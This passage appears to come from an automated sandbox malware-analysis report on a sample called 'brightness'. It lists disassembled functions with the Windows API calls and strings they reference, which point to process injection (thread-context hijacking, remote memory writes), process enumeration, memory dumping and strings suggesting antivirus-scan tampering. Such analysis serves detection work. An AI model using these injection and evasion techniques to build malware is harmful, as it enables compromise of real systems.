Instruction Fuzzy Hash: 8E41E43DB1010C9FEB51EBA8D881A9FB7FAEF84710F114836E641E7295DA74AD018F15

Function 0290881C Relevance: 6.1, APIs: 4, Instructions: 65
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(00000000,00000000,02908903), ref: 02908850
GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02908903), ref: 02908860
GetProcAddress.KERNEL32(74AE0000,00000000), ref: 02908879

Part of subcall function 02907CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02907D6C

FreeLibrary.KERNEL32(74AE0000,00000000,02952388,Function_000065D8,00000004,02952398,02952388,000186A3,00000040,0295239C,74AE0000,00000000,00000000,00000000,00000000,02908903), ref: 029088E3

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: Library$AddressFreeHandleLoadMemoryModuleProcVirtualWrite
String ID:
API String ID: 1543721669-0
Opcode ID: b37ef34b2d57f180c03700dd1298569ac2a006aa66359bc7f8fb3ccdaa4c7dee
Instruction ID: 750d0980ee5a9ff5294e034b83dd1c21d800d9c0fda0bb0b363ef5e24c6cc1d1
Opcode Fuzzy Hash: b37ef34b2d57f180c03700dd1298569ac2a006aa66359bc7f8fb3ccdaa4c7dee
Instruction Fuzzy Hash: A2117F78F44328AFE740FBB8CC41A5E77ADAB85B10F5044257F14FB2D0DA3499108B16

Function 028FE2E4 Relevance: 4.5, APIs: 3, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantClear.OLEAUT32(?), ref: 028FE2F3

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 65be66cbad43da2eb013dfec9d9230114caaf7100f8132dbc82b8fcc39a29a00
Instruction ID: 30fd49d6804a575195573f53b8ebf48bea8454f9a447c15113978e233171114a
Opcode Fuzzy Hash: 65be66cbad43da2eb013dfec9d9230114caaf7100f8132dbc82b8fcc39a29a00
Instruction Fuzzy Hash: D6F0AF2DB08218CADBE4BF28898856D239A5F407047481426A70ADB225DB249C49CB63

Function 0290705C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysFreeString.OLEAUT32(?), ref: 0290735A

Strings

H, xrefs: 02907111

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: FreeString
String ID: H
API String ID: 3341692771-2852464175
Opcode ID: 831129bab04593e78ba59193b3807a948f47684979037babc9262c3beaa1b8b9
Instruction ID: 40b6e29b87429bfee5afe989f9e482f6ca7fb62ec2e437dd623ff415bba6a1ca
Opcode Fuzzy Hash: 831129bab04593e78ba59193b3807a948f47684979037babc9262c3beaa1b8b9
Instruction Fuzzy Hash: 48B1C079A01608AFDB54CF99D480A9DFBF6FF89324F248569E905AB3A4D730A841CF50

Function 028FE37C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 028FE3BC

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: c00634fcd89b859b25ba3f6243723591d5ce70c5fa2e64bfbbe1cc941984232c
Instruction ID: bc749b944508962126fff68a57c044f6036f76abdd63621f33a5c0b0e44a1fca
Opcode Fuzzy Hash: c00634fcd89b859b25ba3f6243723591d5ce70c5fa2e64bfbbe1cc941984232c
Instruction Fuzzy Hash: 9A31727DA04618AFDB94DFACD888AAA77E9FB0C304F444465EA09D3660D334D990CB66

Function 02906CEC Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(00000000,?,00000000,02906D39,?,?,?,00000000), ref: 02906D19

Part of subcall function 028F4C0C: SysFreeString.OLEAUT32(0290ED84), ref: 028F4C1A

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: FreeFromProgString
String ID:
API String ID: 4225568880-0
Opcode ID: 7e9b0b7cab0341c67247273d7b63f0e66b25069323f0949395d9918c07fdab60
Instruction ID: 17593fd1e76bdd37c036128e8b35604d4665e70e5b969a2c7e592191875afdb9
Opcode Fuzzy Hash: 7e9b0b7cab0341c67247273d7b63f0e66b25069323f0949395d9918c07fdab60
Instruction Fuzzy Hash: 4DE0ED3E200308BFE300FBA9CC9295A77ADDF89B40B610472AB00D7280EB70AE108861

Function 028F5814 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(028F0000,?,00000105), ref: 028F5832

Part of subcall function 028F5A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,028F0000,0291E790), ref: 028F5A94
Part of subcall function 028F5A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028F0000,0291E790), ref: 028F5AB2
Part of subcall function 028F5A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028F0000,0291E790), ref: 028F5AD0
Part of subcall function 028F5A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 028F5AEE
Part of subcall function 028F5A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,028F5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 028F5B37
Part of subcall function 028F5A78: RegQueryValueExA.ADVAPI32(?,028F5CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,028F5B7D,?,80000001), ref: 028F5B55
Part of subcall function 028F5A78: RegCloseKey.ADVAPI32(?,028F5B84,00000000,?,?,00000000,028F5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 028F5B77

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
Instruction ID: 340a530cf58aa57fd801f4b3f2a6eecccb980d0af7169f1846194dc7a8a5d4fc
Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
Instruction Fuzzy Hash: 40E06579A003148BCB90DE6CC8C0A8737D8AB08B50F8009A5EE58DF34AD3B4D9608BE1

Function 028F7E10 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,0290FD00,ScanString,0295237C,0291B40C,OpenSession,0295237C,0291B40C,ScanString,0295237C,0291B40C,UacScan,0295237C,0291B40C,UacInitialize), ref: 028F7E1B

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
Instruction ID: 216511c283efffd7f1d9b1c80a00d1c3ec59a6fcea5954b61eb3e42d1a0ca0d2
Opcode Fuzzy Hash: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
Instruction Fuzzy Hash: 72C08CECB122020A2AD0A1FC0CC402A438809081397A42F33E73CEA2F2F32188236431

Function 028F4C48 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(0290ED84), ref: 028F4C1A
SysReAllocStringLen.OLEAUT32(0291C2B4,0290ED84,000000B4), ref: 028F4C62

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
Instruction ID: 005a6579f653dfd79f081eb0c929fbc8108243f3bdcb0a81a9458a74d7134c02
Opcode Fuzzy Hash: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
Instruction Fuzzy Hash: 41D0127C5001059DBAEC999D4548937636A9ED030A348D25B9B0ECA241F7319401CA31

Function 0291BF84 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

timeSetEvent.WINMM(00002710,00000000,0291BF78,00000000,00000001), ref: 0291BF94

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: Eventtime
String ID:
API String ID: 2982266575-0
Opcode ID: d381a7bc9e3500fdd187a3efb950345ce86e92572f28bf3a2e16311699fc01f6
Instruction ID: 048502ea8f5209cc4aef339b217b6647cdf3fa9c32f3f6b93dc0251bc7259723
Opcode Fuzzy Hash: d381a7bc9e3500fdd187a3efb950345ce86e92572f28bf3a2e16311699fc01f6
Instruction Fuzzy Hash: 33C048E97843487AFA10A6AA1CD2F2722CED344B01F200462BA00EA2C1D5E299508A20

Function 028F15CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,028F1A03,?,028F1FC1), ref: 028F15E2

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5400a1cc6f6bd84811f27c6d404dd62a1aa0986242a82d732127efbc98beb753
Instruction ID: 026e09ad2915ec2f05f1212adb84f875b918ad2661c9576f2cb86bacec885caa
Opcode Fuzzy Hash: 5400a1cc6f6bd84811f27c6d404dd62a1aa0986242a82d732127efbc98beb753
Instruction Fuzzy Hash: 50F06DF9B463018FDF45CF799944B117BD2EB89348F108579D609DB788E77984018B00

Function 028F1682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,028F1FC1), ref: 028F16A4

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ef50659aed354739781be7b81d9a57462b4b57082b63211b2a5495cef4556b24
Instruction ID: f336e38f360b221a99379d2cd0e1182a70b1b56f4cd1117e377d46f9052322e0
Opcode Fuzzy Hash: ef50659aed354739781be7b81d9a57462b4b57082b63211b2a5495cef4556b24
Instruction Fuzzy Hash: 4BF09ABAB447A5ABD7109E5E9C84B92BBA4FB10365F050239EA0C9B340D770A8108B94

Function 028F16E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,028F1FE4), ref: 028F1704

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: faa1606d3bcc20e8039100c9275795a114f871060205075b1a8040647cf81cbc
Instruction ID: 0703de7cdc2a35008232ae8abb25db11180abe141a5df69adf3e6629bfdac689
Opcode Fuzzy Hash: faa1606d3bcc20e8039100c9275795a114f871060205075b1a8040647cf81cbc
Instruction Fuzzy Hash: 9FE0867D300311EFD7505A7D5D88712ABD8EB54654F144475F70DDB245D360E8108B60

Non-executed Functions

Function 0290A954 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0290ABDB,?,?,0290AC6D,00000000,0290AD49), ref: 0290A968
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0290A980
GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0290A992
GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0290A9A4
GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0290A9B6
GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0290A9C8
GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0290A9DA
GetProcAddress.KERNEL32(00000000,Process32First), ref: 0290A9EC
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0290A9FE
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 0290AA10
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0290AA22
GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0290AA34
GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0290AA46
GetProcAddress.KERNEL32(00000000,Module32First), ref: 0290AA58
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0290AA6A
GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0290AA7C
GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0290AA8E

Strings

Process32NextW, xrefs: 0290AA1A
Process32First, xrefs: 0290A9E4
Module32FirstW, xrefs: 0290AA74
Thread32Next, xrefs: 0290AA3E
Heap32ListFirst, xrefs: 0290A98A
Thread32First, xrefs: 0290AA2C
CreateToolhelp32Snapshot, xrefs: 0290A978
Heap32Next, xrefs: 0290A9C0
Heap32ListNext, xrefs: 0290A99C
Module32First, xrefs: 0290AA50
Toolhelp32ReadProcessMemory, xrefs: 0290A9D2
Heap32First, xrefs: 0290A9AE
kernel32.dll, xrefs: 0290A963
Module32Next, xrefs: 0290AA62
Process32FirstW, xrefs: 0290AA08
Module32NextW, xrefs: 0290AA86
Process32Next, xrefs: 0290A9F6

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
API String ID: 667068680-597814768
Opcode ID: a773b4587a8e6c0d50655c224535d3f1a132b43102759b064fbe18add50c8832
Instruction ID: f0bc69a1b2d9c776555c134d3d32aff204098099dd8c2e256762946d167e25a9
Opcode Fuzzy Hash: a773b4587a8e6c0d50655c224535d3f1a132b43102759b064fbe18add50c8832
Instruction Fuzzy Hash: 1E31C0B4E843349FEB41AFB9D8E5A2637AEAB457007000A65AA11CF2C5E77894118FD2

Function 02908BA8 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON

Download Yara Rule

APIs

Part of subcall function 0290881C: LoadLibraryA.KERNEL32(00000000,00000000,02908903), ref: 02908850
Part of subcall function 0290881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02908903), ref: 02908860
Part of subcall function 0290881C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 02908879
Part of subcall function 0290881C: FreeLibrary.KERNEL32(74AE0000,00000000,02952388,Function_000065D8,00000004,02952398,02952388,000186A3,00000040,0295239C,74AE0000,00000000,00000000,00000000,00000000,02908903), ref: 029088E3

GetThreadContext.KERNEL32(00000000,02952420,ScanString,029523A4,0290A774,UacInitialize,029523A4,0290A774,ScanBuffer,029523A4,0290A774,ScanBuffer,029523A4,0290A774,UacInitialize,029523A4), ref: 0290943A

Part of subcall function 02907CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02907D6C

SetThreadContext.KERNEL32(00000000,02952420,ScanBuffer,029523A4,0290A774,ScanString,029523A4,0290A774,Initialize,029523A4,0290A774,00000000,-00000008,029524F8,00000004,029524FC), ref: 0290A14F
NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,02952420,ScanBuffer,029523A4,0290A774,ScanString,029523A4,0290A774,Initialize,029523A4,0290A774,00000000,-00000008,029524F8), ref: 0290A15C

Part of subcall function 02908798: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,029523A4,0290A3BF,ScanString,029523A4,0290A774,ScanBuffer,029523A4,0290A774,Initialize,029523A4,0290A774,UacScan), ref: 029087AC
Part of subcall function 02908798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029087C6
Part of subcall function 02908798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,029523A4,0290A3BF,ScanString,029523A4,0290A774,ScanBuffer,029523A4,0290A774,Initialize), ref: 02908802

Strings

SLGetLicenseInformation, xrefs: 02909197
dbgcore, xrefs: 0290A551, 0290A565
NtSetSecurityObject, xrefs: 0290A6C7
bcrypt, xrefs: 0290A3B0, 0290A3C4, 0290A3D8
NtOpenProcess, xrefs: 0290A6DB
ScanString, xrefs: 02908C3A, 02908DE5, 02908F93, 029093BB, 029095A1, 02909728, 02909BB5, 02909D73, 02909EE3, 0290A056, 0290A341, 0290A3EE
MiniDumpReadDumpStream, xrefs: 0290A560
BCryptQueryProviderRegistration, xrefs: 0290A3BF
ntdll, xrefs: 0290A45D, 0290A471, 0290A529, 0290A6CC, 0290A6E0
Initialize, xrefs: 02908F22, 02909530, 029096B7, 02909AA0, 02909D02, 02909E72, 02909FE5, 0290A24A, 0290A57B
NtReadVirtualMemory, xrefs: 0290A458
I_QueryTagInformation, xrefs: 0290A538
UacScan, xrefs: 02908CAB, 02908EC3, 029094BF, 029098BB, 02909A2F, 0290A1D9, 0290A671
MiniDumpWriteDump, xrefs: 0290A54C
sppc, xrefs: 029091AE
OpenSession, xrefs: 02908BE1, 02909004, 029090B6, 0290A487, 0290A5CD
advapi32, xrefs: 0290A53D
NtOpenObjectAuditAlarm, xrefs: 0290A46C, 0290A524
ScanBuffer, xrefs: 02908D04, 02908D8C, 02909127, 0290923C, 029092D9, 02909612, 02909799, 0290992C, 02909B11, 02909C26, 02909DE4, 02909F54, 0290A0C7, 0290A2BB, 0290A4D9, 0290A61F
BCryptVerifySignature, xrefs: 0290A3AB
UacInitialize, xrefs: 02908E6A, 029091CB, 0290934A, 0290944E, 0290984A, 029099BE, 0290A168
BCryptRegisterProvider, xrefs: 0290A3D3

Memory Dump Source

Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd

Similarity

API ID: Library$Thread$AddressContextFreeLoadProc$HandleMemoryModuleResumeVirtualWrite
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 4175202198-51457883
Opcode ID: 5c1fef7e82d1818c89407fbbc67991f8e77558db3d76e683a6b114d0502e12d1
Instruction ID: 0c527dc67a0a2eb583a540696c75c6bd16c7ce98b5d799cc6e13e67cf6980886
Opcode Fuzzy Hash: 5c1fef7e82d1818c89407fbbc67991f8e77558db3d76e683a6b114d0502e12d1
Instruction Fuzzy Hash: BAE2F039B5021C9FDB51EB68CCD0ADF73FAAF85300F1081A29705E7265DA34AE858F56

Function 02908BA6 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON

Download Yara Rule

APIs

Part of subcall function 0290881C: LoadLibraryA.KERNEL32(00000000,00000000,02908903), ref: 02908850
Part of subcall function 0290881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02908903), ref: 02908860
Part of subcall function 0290881C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 02908879
Part of subcall function 0290881C: FreeLibrary.KERNEL32(74AE0000,00000000,02952388,Function_000065D8,00000004,02952398,02952388,000186A3,00000040,0295239C,74AE0000,00000000,00000000,00000000,00000000,02908903), ref: 029088E3

GetThreadContext.KERNEL32(00000000,02952420,ScanString,029523A4,0290A774,UacInitialize,029523A4,0290A774,ScanBuffer,029523A4,0290A774,ScanBuffer,029523A4,0290A774,UacInitialize,029523A4), ref: 0290943A

Strings

SLGetLicenseInformation, xrefs: 02909197
dbgcore, xrefs: 0290A551, 0290A565
NtSetSecurityObject, xrefs: 0290A6C7
